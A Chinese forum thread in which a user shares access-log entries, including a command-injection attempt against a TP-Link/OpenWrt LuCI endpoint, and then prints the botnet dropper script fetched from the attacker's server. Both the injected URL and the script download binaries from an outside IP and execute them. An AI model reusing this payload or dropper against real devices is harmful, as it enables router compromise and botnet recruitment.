查看网站日志发现一个很好玩的东西

技术 | Technology
1

</s><i> </i>179.43.190.218 - - [18/Apr/2024:16:59:22 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1249 "-" "Go-http-client/1.1" 185.224.128.43 - - [18/Apr/2024:17:20:42 +0800] "GET / HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 36.112.213.23 - - [18/Apr/2024:17:41:47 +0800] "GET / HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36" 61.132.217.130 - - [18/Apr/2024:17:41:48 +0800] "GET /favicon.ico HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36" 61.132.217.130 - - [18/Apr/2024:17:41:48 +0800] "GET / HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36" 36.112.213.23 - - [18/Apr/2024:17:41:48 +0800] "GET /favicon.ico HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36" 83.97.73.245 - - [18/Apr/2024:17:59:26 +0800] "GET /actuator/gateway/routes HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 178.62.215.60 - - [18/Apr/2024:18:12:25 +0800] "GET / HTTP/1.1" 404 711 "-" "Go-http-client/1.1" 192.241.236.70 - - [18/Apr/2024:18:22:00 +0800] "GET /ReportServer HTTP/1.1" 404 711 "-" "Mozilla/5.0 zgrab/0.x" 45.56.108.128 - - [18/Apr/2024:18:38:42 +0800] "GET /systembc/password.php HTTP/1.0" 404 1249 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"<i> </i><e>

第一行的,应该是针对 openwrt 的攻击行为,家里刷 openwrt 还是注意一点了。

攻击者把自己的服务器ip也暴露了,

http://103.163.214.97/shk

打开地址,内容如下

``` binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc" server_ip="103.163.214.97" binout="lib" exec="your device just got infected to a bootnoot"

rm -rf $binout
for arch in $binarys
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=./$binout $1
if [ “$status” = “$exec” ]; then
rm -rf $binout
break
fi
rm -rf $binout
done
```

还是下载文件执行,至于后面干了什么就不知道了。
2

好的。我知道了。确实挺好玩。

3

屏蔽了就是